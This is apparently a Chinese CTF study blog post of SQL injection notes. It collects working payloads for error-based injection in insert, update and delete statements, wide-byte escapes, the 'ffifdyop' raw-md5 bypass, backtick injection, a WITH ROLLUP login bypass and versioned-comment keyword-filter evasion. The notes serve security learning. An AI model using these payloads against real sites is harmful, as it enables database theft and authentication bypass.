<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="SQL tips"><meta name="keywords" content="web,ctf,sql,note"><meta name="author" content="MOZac Connecter"><meta name="copyright" content="MOZac Connecter"><title>SQL tips | MOZac的小屋</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script>(adsbygoogle = window.adsbygoogle || []).push({
  google_ad_client: 'ca-pub-7313518215964899',
  enable_page_level_ads: 'true'
});
</script><meta name="google-site-verification" content="UA-186375523"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.3.0'
} </script><meta name="generator" content="Hexo 5.3.0"><link rel="alternate" href="/atom.xml" title="MOZac的小屋" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#insert%E6%B3%A8%E5%85%A5%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">insert注入：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#update%E6%B3%A8%E5%85%A5%EF%BC%9A"><span class="toc-number">2.</span> <span class="toc-text">update注入：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#delete%E6%B3%A8%E5%85%A5%EF%BC%9A"><span class="toc-number">3.</span> <span class="toc-text">delete注入：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5%EF%BC%9A"><span class="toc-number">4.</span> <span class="toc-text">宽字节注入：</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://s3.ax1x.com/2020/12/21/r0TN5t.png"></div><div class="author-info__name text-center">MOZac Connecter</div><div class="author-info__description text-center">安全人Mozac的平凡日常</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://space.bilibili.com/13299663">关注我</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">13</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">22</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">4</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">朋友们</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.vincehut.top/">Vince迷航者</a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">MOZac的小屋</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">文章</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">分类</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">SQL tips</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-10-03</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E7%AC%94%E8%AE%B0/">笔记</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h2 id="insert注入："><a href="#insert注入：" class="headerlink" title="insert注入："></a>insert注入：</h2><p>$sql = “insert into user(username,password) values(‘$username’,’$password’,)”;</p>
<p>payload: 适用于字符型：</p>
<pre><code> &#39; or updatexml(1,concat(0x7e,(database())),0) or &#39;
 适用于数字型：
 &#39; or extractvalue(1,concat(0x5e24,(database()))) or &#39;</code></pre>
<p>$sql = “insert into user(username,password) values(‘’ or updatexml(1,concat(0x7e,(database())),0) or ‘’,’$_POST[‘password’]’)”;</p>
<h2 id="update注入："><a href="#update注入：" class="headerlink" title="update注入："></a>update注入：</h2><p>$sql = “update user set username=’$username’,password=’$password’ where id=$id”;</p>
<p>payload:适用于字符型：</p>
<pre><code>&#39; or updatexml(1,concat(0x7e,(database())),0) or &#39;
 适用于数字型：
&#39; or extractvalue(1,concat(0x5e24,(database()))) or &#39;</code></pre>
<p>$sql = “update user set username=’’ or updatexml(1,concat(0x7e,(database())),0) or ‘’,password=’$_POST[‘password’]’ where id=$_POST[‘id’]”;</p>
<h2 id="delete注入："><a href="#delete注入：" class="headerlink" title="delete注入："></a>delete注入：</h2><p>$sql = “delete from user where id=$id”;</p>
<p>pauload:</p>
<pre><code>   or or updatexml(1,concat(0x7e,(database())),0) or &#39; &#39;
   or extractvalue(1,concat(0x5e24,(database()))) or &#39; &#39;</code></pre>
<p>其他类型的payload：</p>
<pre><code>    &#39;or（有效载荷）or&#39;

&#39;and（有效载荷）and&#39;

&#39;or（有效载荷）and&#39;

&#39;or（有效载荷）and&#39;=&#39;

&#39;*（有效载荷）*&#39;

&#39;or（有效载荷）and&#39;

“ - （有效载荷） - “</code></pre>
<h2 id="宽字节注入："><a href="#宽字节注入：" class="headerlink" title="宽字节注入："></a>宽字节注入：</h2><p>由于转义了单引号成 &#39;  但是%df与\构成双字节，%df\结合为中文，从而%27逃逸</p>
<p>$sql = “select * from user where username=’$username’”;   </p>
<p>payload:</p>
<p>-1%df%27 union select 1,2,group_concat(column_name) from information_schema.columns</p>
<p>where table_name=’table.name’ #  (后面的’’可以使用16进制编码，编码结束后在前面加上0x)</p>
<p>sql语句有 :</p>
<p>$sql = “select * from users where username=&#39;‘.$usename.’&#39; and password=&#39;‘.$password.’&#39;“;</p>
<p>$username,$password 被过滤：</p>
<p>function clean($str){<br>    if(get_magic_quotes_gpc()){<br>        $str=stripslashes($str); //删除字符串里的<br>    }<br> return htmlentities($str, ENT_QUOTES);<br> //比如我们对字符串”<script>"使用htmlentities函数，字符串"<script>"将被转化为"&lt;script&gt;",<br> //将"<"和“>”转换为HTML实体，可以防止浏览器将它们作为HTML元素的一部分被解释或运行(经常使用在用户提交表单数据的时候)。<br> //htmlentities($str, ENT_COMPAT); // 只转换双引号<br> //htmlentities($str, ENT_QUOTES); // 转换双引号和单引号<br> //htmlentities($str, ENT_NOQUOTES); // 不转换任何引号<br>}</p>
<p>payload:</p>
<p>username=admin&amp;password=or 1 #</p>
<p>$sql = “select * from users where username=&#39;‘. admin\ .’&#39; and password=&#39;‘. or 1 # .’&#39;“;</p>
<p>md5加密后的的SQL注入：</p>
<p>$sql = “SELECT * FROM admin WHERE pass = ‘“.md5($password,true).”‘“;</p>
<p>思路比较明确，当md5后的hex转换成字符串后，如果包含’or’<trash>这样的字符串，那整个sql变成</p>
<p>SELECT * FROM admin WHERE pass = ‘’or’6<trash>‘</p>
<p>很明显可以注入了。</p>
<p>难点就在如何寻找这样的字符串，我只是顺手牵羊，牵了一个。。<br>提供一个字符串：ffifdyop<br>md5后，276f722736c95d99e921722cf9ed621c<br>再转成字符串：’or’6<trash></p>
<p>sql注入之反引号注入：</p>
<p>mysqli_query($mysqli,”desc <code>secret_&#123;$table&#125;</code>“) or Hacker();<br>$sql = “select ‘flag{xxx}’ from secret_{$table}”;</p>
<p>反引号一般在Esc键的下方，和～在一起。它是为了区分MySQL的保留字与普通字符而引入的符号<br>    create table desc 报错<br>    create table <code>desc</code> 成功<br>    一般我们建表时都会将表名，库名都加上反引号来保证语句的执行度。<br>    table=test<code> </code>union select group_concat(flagUwillNeverKnow) from secret_flag limit 1,1</p>
<p>sql注入之先查询用户，在比较密码</p>
<p>$sql=”SELECT * FROM interest WHERE uname = ‘{$_POST[‘uname’]}’”;  //查询uname<br>$query = mysql_query($sql);<br>if (mysql_num_rows($query) == 1) {  //限制查询只有一条<br>    $key = mysql_fetch_array($query);<br>    if($key[‘pwd’] == $_POST[‘pwd’]) {    //传入的pwd要符合数据库里的pwd<br>        print “CTF{XXXXXX}”;<br>    }else{<br>        print “亦可赛艇！”;<br>    }<br>}else{<br>    print “一颗赛艇！”;<br>}</p>
<p>使用rollup技巧来绕过：<br>    在sql命令行里：<br>        select uname,pwd from test group by pwd with rollup;<br>        +————–+——-+<br>        | uname        | pwd   |<br>        +————–+——-+<br>        | 123          | 123   |<br>        | 123          | NULL  |<br>        +————–+——-+<br>        rollup作用：在查询结果中多增加一行，而且他的的pwd的值为null。<br>        传参$_POST[pwd]的值为空时，$key[‘pwd’] == $_POST[‘pwd’]满足</p>
<pre><code>在此之前我们还有一个条件要满足`mysql_num_rows($query) == 1`，我们要选择pass为NULL的单独的这一条记录。
从源码分析可得，过滤了逗号，我们不能简单的使用`limit 1,1`这样的语法，而是可以使用`limit 1 offset 1`。就本地环境而言，比如
    select uname,pwd from test group by pwd with rollup limit 1 offset 2;
    +--------------+-------+
    | uname        | pwd   |
    +--------------+-------+
    | 123          | NULL  |
    +--------------+-------+

$sql=&quot;SELECT * FROM interest WHERE uname = &#39;&#123;$_POST[&#39;uname&#39;]&#125;&#39;&quot;;

payload: uname = &#39; or 1=1 group by pwd with rollup limit 1 offset 2 #
         pwd = 空

$sql=&quot;SELECT * FROM interest WHERE uname = &#39;&#123; &#39; or 1=1 group by pwd with rollup limit 1 offset 2 # &#125;&#39;&quot;;</code></pre>
<p>正则绕过preg_match(“/\b(select|insert|update|delete)\b/i”,$message)之SQL注入</p>
<p>if(preg_match(“/\b(select|insert|update|delete)\b/i”,$message)){</p>
<pre><code>    die(&quot;hello,sangebaimao!&quot;);</code></pre>
<p>}</p>
<p>/<em>！</em>/只在mysql中有用，在别的数据库中这只是注释，但是在mysql，/<em>!select 1</em>/可以成功执行，在语句前可以加上5位数字，代表版本号，表示只有在大于该版本的mysql中不作为注释</p>
<p>$sql=”insert guestbook(<code>message</code>) value(‘$message’);”;</p>
<p>payload：<br>   updatexml：<br>            ?message=aaa\x27 and updatexml(0,concat(0x27,(/<em>!00000select version()</em>/)),0)%23<br>   extractvalue：<br>               ?message=aaa\x27 and extractvalue(0,concat(0x27,(/<em>!00000select database()</em>/))) %23<br>   exp：<br>         ?message=aaa\x27 and (/<em>!00000select exp(~(/</em>!00000select*/ * from (/<em>!00000select</em>/ version())a)))%23</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">MOZac Connecter</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://mozac-void.yixiangtang.icu/2020/10/03/SQL-tips/">https://mozac-void.yixiangtang.icu/2020/10/03/SQL-tips/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://mozac-void.yixiangtang.icu">MOZac的小屋</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/web/">web</a><a class="post-meta__tags" href="/tags/ctf/">ctf</a><a class="post-meta__tags" href="/tags/sql/">sql</a><a class="post-meta__tags" href="/tags/note/">note</a></div><div class="social-share pull-right" data-disabled="facebook"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/12/28/Postfix/"><i class="fa fa-chevron-left">  </i><span>CentOS下的Postfix部署</span></a></div><div class="next-post pull-right"><a href="/2020/10/03/Web-Upload-1/"><span>WEB Upload</span><i class="fa fa-chevron-right"></i></a></div></nav><div class="post-adv"><iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=728 height=110 src="//music.163.com/outchain/player?type=0&id=2110349418&auto=1&height=90"></iframe></div><div id="lv-container" data-id="city" data-uid="MTAyMC81MjI0My8yODcyMg=="><script>(function(d, s) {
    var j, e = d.getElementsByTagName(s)[0];
    if (typeof LivereTower === 'function') { return; }
    j = d.createElement(s);
    j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
    j.async = true;
    e.parentNode.insertBefore(j, e);
})(document, 'script');</script></div></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2019 - 2021 By MOZac Connecter</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="icp"><a><span>鲁ICP备2020049110号</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script id="ribbon" src="/js/third-party/canvas-ribbon.js" size="150" alpha="0.6" zIndex="-1" data-click="false"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>